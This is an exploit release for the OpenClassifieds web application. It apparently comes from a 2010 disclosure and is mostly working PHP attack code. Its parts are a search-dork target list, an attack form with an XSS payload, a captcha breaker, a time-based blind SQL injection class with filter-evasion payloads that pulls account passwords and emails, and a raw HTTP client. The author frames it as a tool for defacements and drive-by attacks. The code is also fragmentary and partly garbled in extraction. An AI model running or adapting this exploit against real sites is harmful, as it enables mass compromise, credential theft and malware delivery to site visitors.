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HistoryDec 28, 2010 - 12:00 a.m.

Multiple Vulnerabilities in OpenClassifieds


I understand that this is a vain hope that bugtraq will start posting something useful.

Author:Michael Brooks (Rook)<br>
Exploit chain:captcha bypass->sqli(insert)->persistant xss on front page<br>
If registration is required an extra link in the chain is added:<br>
Exploit chain:blind sqli(select)->captcha bypass->sqli(insert)->persistant xss on front page<br>
sites with SEO url's enabled:<br>
"powered by Open Classifieds" inurl:"publish-a-new-ad.htm" (85,000 results)<br>
or default urls:<br>
"powered by Open Classifieds" inurl:"item-new.php" (16,500 results)<br>
Total sites: ~100,000<br>
The target must be a link to the document root of OpenClassifieds<br>
(If the exploit doesn't immediately reload then blind sqli is required, which will take a few minutes ;)<br>
Target:&nbsp;&nbsp;<input size=128 name=target value="http://localhost/&quot;&gt;&lt;br&gt;
Payload:<input size=128 name=xss value="<script>alert('xss')</script>"><br>
<input type=submit value="Attack">
I have always wanted to write a chained exploit with a captcha bypass, so I couldn't miss this
opportunity. I spent a bit more effort on this exploit even though there aren't very many hits (around
100k starts to be worth while). Regardless, I dug into the application and pulled out the vulnerabilities
needed to Finnish my masterpiece. Usually when I write a Remote Code Execution exploit for a web
app you guys just deface the site or throw up drive-by attacks. So I figured, persistent XSS on the
front page is equally as valuable, especially with yet another IE 0-day in the wild. The chain is within
the application its self. Process sand-boxing like chroot/AppArmor/SELinux/Application-V(MS)
doesn't come into play. It works regardless of the operating system or configurations (Suhosin,
safemode, magic_quotes_gpc and register_globals doesn't come into play). I focused on the
application's internal configurations that could break the exploitation process. In this case seo friendly
urls and requiring an account before posting.

"This web application [OpenClassifieds] is developed to be fast, light, secure and SEO friendly."
Usually when I see that an application claims to be secure, they really don't know what the fuck they
are doing. OpenClassifieds' Security model is deeply flawed and as a result there are MANY
vulnerabilities in this code base which allowed me to string a few cool ones together to make an
interesting exploit. OpenClassifieds is sanitizing everything on input using cG() and cP(), these
functions are used to perform a mysql_real_escape_string() on all GET and POST variables. Most
servers aren't using an exotic character set so from a security stand point this is exactly identical to
magic_quotes_gpc. So I dusted off my usual magic_quotes_gpc auditing tricks, look for
stripslashes(),base64decode(),urldecode(),html_entity_decode() lack of quote marks around variables
in a query, ect… Sanitation must ALWAYS be done at the time of use, parametrized queries are a
good example of this. Its impossible to account for all the ways a variable can be mangled once it
enters a program and if you Sanitize input when it first enters the program there will be cases where it
will become dangerous again. This isn't only a problem for SQLi, its also a problem for XSS. I am
inserting JS into the database, which isn't a vulnerablity, but printing it, is persistant XSS.

The blind sql injection is a bit strange. I can't use white space or commas, which is a pain. I had to
rewrite my general purpose Blind SQLi Class to accommodate. A binary search is used to greatly
speed up the blind sqli attack.
(which I also used in my php-nuke exploit:;

Special thanks to Reiners for this sqli filter evasion cheat sheet:
Here are some changes I had to make to my blind sql injection class:
"select substring('abc',1,1)"=>"select substring('abc' from 1 for 1)"
if(greatest(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)" =>"case ".sprintf($question,"0+".$cur).">".$pos." when true then
sleep(".$this->timeout.") end"

CWE Violations leveraged by this exploit:
CWE-256: Plaintext Storage of a Password
CWE-804: Guessable CAPTCHA (I asked that they create this CWE when I ran into a guy that works for Mitre.)
CWE-89: SQL Injection x2
CWE-79: Cross-site Scripting (Persistant)

Vulnerable captcha:
openclassifieds/includes/common.php line 291
function encode_str ($input){//converts the input into Ascii HTML, to ofuscate a bit
for ($i = 0; $i < strlen($input); $i++) {
$output .= "&#".ord($input[$i]).';';
//$output = htmlspecialchars($output);//uncomment to escape sepecial chars
return $output;

function mathCaptcha(){//generates a captcha for the form
$first_number=mt_rand(1, 94);//first operation number
$second_number=mt_rand(1, 5);//second operation number

    $_SESSION[&quot;mathCaptcha&quot;]=&#40;$first_number+$second_number&#41;;//operation result

    $operation=&quot; &lt;b&gt;&quot;.encode_str&#40;$first_number .&quot; + &quot;. $second_number&#41;.&quot;&lt;/b&gt;?&quot;;//operation codifieds

    echo _&#40;&quot;How much is&quot;&#41;.&quot; &quot;.$operation;


Vulnerable persistant xss and sqli
/content/item-new.php line 41
$ocdb->insert(TABLE_PREFIX."posts (idCategory,type,title,description,price,idLocation,place,name,email,phone,password,ip,hasImages)","".



function main(){
if($_REQUEST['target'] && $_REQUEST['xss']){
print("<b>Persistant XSS attack was sucessful.</b>");
print("<b>Persistant XSS attack has failed.</b>");

//w00t, I can crack your captcha with 4 lines of code!
//It would have been 3 if i had used eval(), but that would be a vulnerability ;)
function breakCaptcha($page){
$math=new EvalMath();
return $math->evaluate($code);

function xssFrontPage($url,$xss){
$h=new http_client();
#Authentication required.
if(strstr($page,'Location: http')){#Do we need authentication?
print "Blind SQL Injection required.<br>";
$sex=new openclassifieds_blind_sql_injection($url."/");
print "Target is vulnerable to attack!<br>";
print "Found Password:<b>$pass</b><br>";
print "Found email:<b>$email</b><br>";
die("This target is not exploitable!<br>");
$email="[email protected]";
$pwd=mt_rand(1,9999999);//Strong password :p
//Stored xss in the description,place and name columns.

//I could use sql injection to find the id, but thats noisy and slow.
//seo friendly
}else if(preg_match("/item\=(.
#Now lets activate the XSS post.
$test=strstr($page,"<script language='JavaScript' type='text/javascript'>alert('");
return $test;

//The blind_sql_injeciton calss is a general exploit framework that we are inheriting.
class openclassifieds_blind_sql_injection extends blind_sql_injection {
//This is the blind sql injection request.
function query($check){
//build the http request to Inject a query:
//"%26%23039;" is a single quote encoded with urlencode(htmlencode("'",ENT_QUOTES));
$payload="%26%23039; or (select ".$check." from oc_accounts where active=1 limit 1) or 1=%26%23039;";
#white space becomes and underscore "_" so it must be replaced.
$payload=str_replace(" ","/**/",$payload);

//This is a very efficient blind sql injection class.
class blind_sql_injection{
var $url, $backup_url, $result, $http, $request_count, $timeout;
function blind_sql_injection($url,$timeout=10){
$this->http=new http_client();
function set_get($get){
function set_referer($referer){
function set_post($post){
function test_target(){
return $this->send("case true when true then sleep(".$this->timeout.") when false then sleep(0) end")&&!$this->send("case false when true then
sleep(".$this->timeout.") when false then sleep(0) end");
#return $this->send("if(true,sleep(".$this->timeout."),0)")&&!$this->send("if(false,sleep(".$this->timeout."),0)");
function num_to_hex($arr){
foreach($arr as $a){
return $ret;
###These where not ported to the non-comma version.
//Looking for a string of length 32 and base 16 in ascii chars.
#function find_md5($column){
# return $this->num_to_hex($this->bin_finder(16,32,"conv(substring($column,%s,1),16,10)"));
#function find_sha1($column){
# return $this->num_to_hex($this->bin_finder(16,40,"conv(substring($column,%s,1),16,10)"));
//Look for an ascii string of arbitrary length.
function find_string($column){
//A length of zero means we are looking for a null byte terminated string.
$result=$this->bin_finder(128,0,"ascii(substring($column from %s for 1))");
foreach($result as $r){
return strrev($ret);
//query() is a method that generates the sql injection request
function query($check){
//This function must be overridden.
function recheck($result,$question,$base){
//Force a long timeout.
foreach($result as $r){
function linear_finder($base,$length,$question){
#Binary search for mysql based sql injection.
function bin_finder($base,$length,$question){
$pos= $low+(($high-$low)/2);
#asking the sql database if the current value is greater than $pos
if($this->send("case ".sprintf($question,"0+".$cur).">".$pos." when true then sleep(".$this->timeout.") end")){
#if this is true then the value must be the modulus.
#asking the sql database if the current value is less than $pos
}else if($this->send("case ".sprintf($question,"0+".$cur)."<".$pos." when true then sleep(".$this->timeout.") end")){
#}else if($this->send("if(least(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)")){
#if this is true the value must be zero, or in the case of ascii, a null byte.
#We have found the null terminator so we have finnished our search for a string.
#both greater than and less then where asked, so so then the answer is our guess $pos.
return $result;
//Fire off the request
function send($quesiton){
//build the injected query.
//backup_url is for set_get()
return (time()-$start>=$this->timeout);
//retroGod RIP
function charEncode($string){
return $char;

//General purpose http client that works on a default php install. (curl not required)
class http_client{
var $proxy_ip='', $proxy_port='', $proxy_name='', $proxy_pass='', $referer='',$cookie='',$postdata='';
function send($loc){
//overload function polymorphism between gets and posts
$fp = pfsockopen( $this->proxy_ip, $this->proxy_port, &$errno, &$errstr, 120 );
$fp = fsockopen( $url['host'], $url['port'], &$errno, &$errstr, 120 );
if( !$fp ) {
print "$errstr ($errno)<br>\nn";
return false;
} else {
if( $this->postdata=='' ) {
$request="GET ".$url['path']."?".$url['query']." HTTP/1.1\r\n";
} else {
$request="POST ".$url['path']."?".$url['query']." HTTP/1.1\r\n";
$request.="Proxy-Authorization: Basic ".base64_encode($this->proxy_name.":".$this->proxy_pass)."\r\n\r\n";
$request.="Host: ".$url['host'].":".$url['port']."\r\n";
$request.="User-Agent: ".$ua."\r\n";
$request.="Accept: text/plain\r\n";
$request.="Referer: ".$this->referer."\r\n";
$request.="Connection: Close\r\n";
$request.="Cookie: ".$this->cookie."\r\n" ;
if( $this->postdata!='' ) {
$strlength = strlen( $this->postdata );
$request.="Content-type: application/x-www-form-urlencoded\r\n" ;
$request.="Content-length: ".$strlength."\r\n\r\n";
fputs( $fp, $request."\r\n\r\n" );
while( !feof( $fp ) ) {
$output .= fgets( $fp, 1024 );
fclose( $fp );
if(strstr($header[0],"Set-Cookie: ") && $this->cookie==''){
$cookie=explode("Set-Cookie: ",$header[0]);
return $output;
//Use a http proxy
function proxy($proxy){ //user:pass@ip:port
//Parses the results from a PHP error to use as a path disclosure.
function getPath($url,$pops=1){
//Regular error reporting:
$resp=explode("array given in <b>",$html);
$resp = explode("</b>",$resp[1]);
//xdebug's error reporting:
$resp=explode("array given in ",$html);
$resp = explode(" ",$resp[1]);
//Can't use dirname()
return $path;
//Grab the server type from the http header.
function getServer($url){
$header=explode("Server: ",$resp);
return $server[0];

#used to evaluate the captcha. 1+2=3
class EvalMath {

            var $suppress_errors = false;
            var $last_error = null;

            var $v = array&#40;&#39;e&#39;=&gt;2.71,&#39;pi&#39;=&gt;3.14&#41;; // variables &#40;and constants&#41;
            var $f = array&#40;&#41;; // user-defined functions
            var $vb = array&#40;&#39;e&#39;, &#39;pi&#39;&#41;; // constants
            var $fb = array&#40;  // built-in functions

            function EvalMath&#40;&#41; {
                    // make the variables a little more accurate
                    $this-&gt;v[&#39;pi&#39;] = pi&#40;&#41;;
                    $this-&gt;v[&#39;e&#39;] = exp&#40;1&#41;;

            function e&#40;$expr&#41; {
                    return $this-&gt;evaluate&#40;$expr&#41;;

            function evaluate&#40;$expr&#41; {
                    $this-&gt;last_error = null;
                    $expr = trim&#40;$expr&#41;;
                    if &#40;substr&#40;$expr, -1, 1&#41; == &#39;;&#39;&#41; $expr = substr&#40;$expr, 0, strlen&#40;$expr&#41;-1&#41;; // strip semicolons at the end
                    // is it a variable assignment?
                    if &#40;preg_match&#40;&#39;/^&#92;s*&#40;[a-z]&#92;w*&#41;&#92;s*=&#92;s*&#40;.+&#41;$/&#39;, $expr, $matches&#41;&#41; {
                            if &#40;in_array&#40;$matches[1], $this-&gt;vb&#41;&#41; { // make sure we&#39;re not assigning to a constant
                                    return $this-&gt;trigger&#40;&quot;cannot assign to constant &#39;$matches[1]&#39;&quot;&#41;;
                            if &#40;&#40;$tmp = $this-&gt;pfx&#40;$this-&gt;nfx&#40;$matches[2]&#41;&#41;&#41; === false&#41; return false; // get the result and make sure it&#39;s good
                            $this-&gt;v[$matches[1]] = $tmp; // if so, stick it in the variable array
                            return $this-&gt;v[$matches[1]]; // and return the resulting value
                    // is it a function assignment?
                    } elseif &#40;preg_match&#40;&#39;/^&#92;s*&#40;[a-z]&#92;w*&#41;&#92;s*&#92;&#40;&#92;s*&#40;[a-z]&#92;w*&#40;?:&#92;s*,&#92;s*[a-z]&#92;w*&#41;*&#41;&#92;s*&#92;&#41;&#92;s*=&#92;s*&#40;.+&#41;$/&#39;, $expr, $matches&#41;&#41; {
                            $fnn = $matches[1]; // get the function name
                            if &#40;in_array&#40;$matches[1], $this-&gt;fb&#41;&#41; { // make sure it isn&#39;t built in
                                    return $this-&gt;trigger&#40;&quot;cannot redefine built-in function &#39;$matches[1]&#40;&#41;&#39;&quot;&#41;;
                            $args = explode&#40;&quot;,&quot;, preg_replace&#40;&quot;/&#92;s+/&quot;, &quot;&quot;, $matches[2]&#41;&#41;; // get the arguments
                            if &#40;&#40;$stack = $this-&gt;nfx&#40;$matches[3]&#41;&#41; === false&#41; return false; // see if it can be converted to postfix
                            for &#40;$i = 0; $i&lt;count&#40;$stack&#41;; $i++&#41; { // freeze the state of the non-argument variables
                                    $token = $stack[$i];
                                    if &#40;preg_match&#40;&#39;/^[a-z]&#92;w*$/&#39;, $token&#41; and !in_array&#40;$token, $args&#41;&#41; {
                                            if &#40;array_key_exists&#40;$token, $this-&gt;v&#41;&#41; {
                                                    $stack[$i] = $this-&gt;v[$token];
                                            } else {
                                                    return $this-&gt;trigger&#40;&quot;undefined variable &#39;$token&#39; in function definition&quot;&#41;;
                            $this-&gt;f[$fnn] = array&#40;&#39;args&#39;=&gt;$args, &#39;func&#39;=&gt;$stack&#41;;
                            return true;
                    } else {
                            return $this-&gt;pfx&#40;$this-&gt;nfx&#40;$expr&#41;&#41;; // straight up evaluation, woo

            function vars&#40;&#41; {
                    $output = $this-&gt;v;
                    return $output;

            function funcs&#40;&#41; {
                    $output = array&#40;&#41;;
                    foreach &#40;$this-&gt;f as $fnn=&gt;$dat&#41;
                            $output[] = $fnn . &#39;&#40;&#39; . implode&#40;&#39;,&#39;, $dat[&#39;args&#39;]&#41; . &#39;&#41;&#39;;
                    return $output;

            //===================== HERE BE INTERNAL METHODS ====================&#92;&#92;

            // Convert infix to postfix notation
            function nfx&#40;$expr&#41; {

                    $index = 0;
                    $stack = new EvalMathStack;
                    $output = array&#40;&#41;; // postfix form of expression, to be passed to pfx&#40;&#41;
                    $expr = trim&#40;strtolower&#40;$expr&#41;&#41;;

                    $ops   = array&#40;&#39;+&#39;, &#39;-&#39;, &#39;*&#39;, &#39;/&#39;, &#39;^&#39;, &#39;_&#39;&#41;;
                    $ops_r = array&#40;&#39;+&#39;=&gt;0,&#39;-&#39;=&gt;0,&#39;*&#39;=&gt;0,&#39;/&#39;=&gt;0,&#39;^&#39;=&gt;1&#41;; // right-associative operator?  
                    $ops_p = array&#40;&#39;+&#39;=&gt;0,&#39;-&#39;=&gt;0,&#39;*&#39;=&gt;1,&#39;/&#39;=&gt;1,&#39;_&#39;=&gt;1,&#39;^&#39;=&gt;2&#41;; // operator precedence

                    $expecting_op = false; // we use this in syntax-checking the expression
                                                               // and determining when a - is a negation

                    if &#40;preg_match&#40;&quot;/[^&#92;w&#92;s+*^&#92;/&#40;&#41;&#92;.,-]/&quot;, $expr, $matches&#41;&#41; { // make sure the characters are all good
                            return $this-&gt;trigger&#40;&quot;illegal character &#39;{$matches[0]}&#39;&quot;&#41;;

                    while&#40;1&#41; { // 1 Infinite Loop ;&#41;
                            $op = substr&#40;$expr, $index, 1&#41;; // get the first character at the current index
                            // find out if we&#39;re currently at the beginning of a number/variable/function/parenthesis/operand
                            $ex = preg_match&#40;&#39;/^&#40;[a-z]&#92;w*&#92;&#40;?|&#92;d+&#40;?:&#92;.&#92;d*&#41;?|&#92;.&#92;d+|&#92;&#40;&#41;/&#39;, substr&#40;$expr, $index&#41;, $match&#41;;
                            if &#40;$op == &#39;-&#39; and !$expecting_op&#41; { // is it a negation instead of a minus?
                                    $stack-&gt;push&#40;&#39;_&#39;&#41;; // put a negation on the stack
                            } elseif &#40;$op == &#39;_&#39;&#41; { // we have to explicitly deny this, because it&#39;s legal on the stack 
                                    return $this-&gt;trigger&#40;&quot;illegal character &#39;_&#39;&quot;&#41;; // but not in the input expression
                            } elseif &#40;&#40;in_array&#40;$op, $ops&#41; or $ex&#41; and $expecting_op&#41; { // are we putting an operator on the stack?
                                    if &#40;$ex&#41; { // are we expecting an operator but have a number/variable/function/opening parethesis?
                                            $op = &#39;*&#39;; $index--; // it&#39;s an implicit multiplication
                                    // heart of the algorithm:
                                    while&#40;$stack-&gt;count &gt; 0 and &#40;$o2 = $stack-&gt;last&#40;&#41;&#41; and in_array&#40;$o2, $ops&#41; and &#40;$ops_r[$op] ? $ops_p[$op] &lt; $ops_p[$o2] :

$ops_p[$op] <= $ops_p[$o2])) {
$output[] = $stack->pop(); // pop stuff off the stack into the output
// many thanks:
$stack->push($op); // finally put OUR operator onto the stack
$expecting_op = false;
} elseif ($op == ')' and $expecting_op) { // ready to close a parenthesis?
while (($o2 = $stack->pop()) != '(') { // pop off the stack back to the last (
if (is_null($o2)) return $this->trigger("unexpected ')'");
else $output[] = $o2;
if (preg_match("/^([a-z]\w*)\($/", $stack->last(2), $matches)) { // did we just close a function?
$fnn = $matches[1]; // get the function name
$arg_count = $stack->pop(); // see how many arguments there were (cleverly stored on the stack, thank you)
$output[] = $stack->pop(); // pop the function and push onto the output
if (in_array($fnn, $this->fb)) { // check the argument count
if($arg_count > 1)
return $this->trigger("too many arguments ($arg_count given, 1 expected)");
} elseif (array_key_exists($fnn, $this->f)) {
if ($arg_count != count($this->f[$fnn]['args']))
return $this->trigger("wrong number of arguments ($arg_count given, " .
count($this->f[$fnn]['args']) . " expected)");
} else { // did we somehow push a non-function on the stack? this should never happen
return $this->trigger("internal error");
} elseif ($op == ',' and $expecting_op) { // did we just finish a function argument?
while (($o2 = $stack->pop()) != '(') {
if (is_null($o2)) return $this->trigger("unexpected ','"); // oops, never had a (
else $output[] = $o2; // pop the argument expression stuff and push onto the output
// make sure there was a function
if (!preg_match("/^([a-z]\w*)\($/", $stack->last(2), $matches))
return $this->trigger("unexpected ','");
$stack->push($stack->pop()+1); // increment the argument count
$stack->push('('); // put the ( back on, we'll need to pop back to it again
$expecting_op = false;
} elseif ($op == '(' and !$expecting_op) {
$stack->push('('); // that was easy
$allow_neg = true;
} elseif ($ex and !$expecting_op) { // do we now have a function/variable/number?
$expecting_op = true;
$val = $match[1];
if (preg_match("/^([a-z]\w*)\($/", $val, $matches)) { // may be func, or variable w/ implicit multiplication against
if (in_array($matches[1], $this->fb) or array_key_exists($matches[1], $this->f)) { // it's a func
$expecting_op = false;
} else { // it's a var w/ implicit multiplication
$val = $matches[1];
$output[] = $val;
} else { // it's a plain old var or num
$output[] = $val;
$index += strlen($val);
} elseif ($op == ')') { // miscellaneous error checking
return $this->trigger("unexpected ')'");
} elseif (in_array($op, $ops) and !$expecting_op) {
return $this->trigger("unexpected operator '$op'");
} else { // I don't even want to know what you did to get here
return $this->trigger("an unexpected error occured");
if ($index == strlen($expr)) {
if (in_array($op, $ops)) { // did we end with an operator? bad.
return $this->trigger("operator '$op' lacks operand");
} else {
while (substr($expr, $index, 1) == ' ') { // step the index past whitespace (pretty much turns whitespace
$index++; // into implicit multiplication if no operator is there)

                    while &#40;!is_null&#40;$op = $stack-&gt;pop&#40;&#41;&#41;&#41; { // pop everything off the stack and push onto output
                            if &#40;$op == &#39;&#40;&#39;&#41; return $this-&gt;trigger&#40;&quot;expecting &#39;&#41;&#39;&quot;&#41;; // if there are &#40;s on the stack, &#40;&#41;s were unbalanced
                            $output[] = $op;
                    return $output;

            // evaluate postfix notation
            function pfx&#40;$tokens, $vars = array&#40;&#41;&#41; {

                    if &#40;$tokens == false&#41; return false;

                    $stack = new EvalMathStack;

                    foreach &#40;$tokens as $token&#41; { // nice and easy
                            // if the token is a binary operator, pop two values off the stack, do the operation, and push the result back on
                            if &#40;in_array&#40;$token, array&#40;&#39;+&#39;, &#39;-&#39;, &#39;*&#39;, &#39;/&#39;, &#39;^&#39;&#41;&#41;&#41; {
                                    if &#40;is_null&#40;$op2 = $stack-&gt;pop&#40;&#41;&#41;&#41; return $this-&gt;trigger&#40;&quot;internal error&quot;&#41;;
                                    if &#40;is_null&#40;$op1 = $stack-&gt;pop&#40;&#41;&#41;&#41; return $this-&gt;trigger&#40;&quot;internal error&quot;&#41;;
                                    switch &#40;$token&#41; {
                                            case &#39;+&#39;:
                                                    $stack-&gt;push&#40;$op1+$op2&#41;; break;
                                            case &#39;-&#39;:
                                                    $stack-&gt;push&#40;$op1-$op2&#41;; break;
                                            case &#39;*&#39;:
                                                    $stack-&gt;push&#40;$op1*$op2&#41;; break;
                                            case &#39;/&#39;:
                                                    if &#40;$op2 == 0&#41; return $this-&gt;trigger&#40;&quot;division by zero&quot;&#41;;
                                                    $stack-&gt;push&#40;$op1/$op2&#41;; break;
                                            case &#39;^&#39;:
                                                    $stack-&gt;push&#40;pow&#40;$op1, $op2&#41;&#41;; break;
                            // if the token is a unary operator, pop one value off the stack, do the operation, and push it back on
                            } elseif &#40;$token == &quot;_&quot;&#41; {
                            // if the token is a function, pop arguments off the stack, hand them to the function, and push the result back on
                            } elseif &#40;preg_match&#40;&quot;/^&#40;[a-z]&#92;w*&#41;&#92;&#40;$/&quot;, $token, $matches&#41;&#41; { // it&#39;s a function!
                                    $fnn = $matches[1];
                                    if &#40;in_array&#40;$fnn, $this-&gt;fb&#41;&#41; { // built-in function:
                                            if &#40;is_null&#40;$op1 = $stack-&gt;pop&#40;&#41;&#41;&#41; return $this-&gt;trigger&#40;&quot;internal error&quot;&#41;;
                                            $fnn = preg_replace&#40;&quot;/^arc/&quot;, &quot;a&quot;, $fnn&#41;; // for the &#39;arc&#39; trig synonyms
                                            if &#40;$fnn == &#39;ln&#39;&#41; $fnn = &#39;log&#39;;
                                            eval&#40;&#39;$stack-&gt;push&#40;&#39; . $fnn . &#39;&#40;$op1&#41;&#41;;&#39;&#41;; // perfectly safe eval&#40;&#41;
                                    } elseif &#40;array_key_exists&#40;$fnn, $this-&gt;f&#41;&#41; { // user function
                                            // get args
                                            $args = array&#40;&#41;;
                                            for &#40;$i = count&#40;$this-&gt;f[$fnn][&#39;args&#39;]&#41;-1; $i &gt;= 0; $i--&#41; {
                                                    if &#40;is_null&#40;$args[$this-&gt;f[$fnn][&#39;args&#39;][$i]] = $stack-&gt;pop&#40;&#41;&#41;&#41; return $this-&gt;trigger&#40;&quot;internal error&quot;&#41;;
                                            $stack-&gt;push&#40;$this-&gt;pfx&#40;$this-&gt;f[$fnn][&#39;func&#39;], $args&#41;&#41;; // yay... recursion!!!!
                            // if the token is a number or variable, push it on the stack
                            } else {
                                    if &#40;is_numeric&#40;$token&#41;&#41; {
                                    } elseif &#40;array_key_exists&#40;$token, $this-&gt;v&#41;&#41; {
                                    } elseif &#40;array_key_exists&#40;$token, $vars&#41;&#41; {
                                    } else {
                                            return $this-&gt;trigger&#40;&quot;undefined variable &#39;$token&#39;&quot;&#41;;
                    // when we&#39;re out of tokens, the stack should have a single element, the final result
                    if &#40;$stack-&gt;count != 1&#41; return $this-&gt;trigger&#40;&quot;internal error&quot;&#41;;
                    return $stack-&gt;pop&#40;&#41;;

            // trigger an error, but nicely, if need be
            function trigger&#40;$msg&#41; {
                    $this-&gt;last_error = $msg;
                    if &#40;!$this-&gt;suppress_errors&#41; trigger_error&#40;$msg, E_USER_WARNING&#41;;
                    return false;

    // for internal use
    class EvalMathStack {

            var $stack = array&#40;&#41;;
            var $count = 0;

            function push&#40;$val&#41; {
                    $this-&gt;stack[$this-&gt;count] = $val;

            function pop&#40;&#41; {
                    if &#40;$this-&gt;count &gt; 0&#41; {
                            return $this-&gt;stack[$this-&gt;count];
                    return null;

            function last&#40;$n=1&#41; {
                    return $this-&gt;stack[$this-&gt;count-$n];
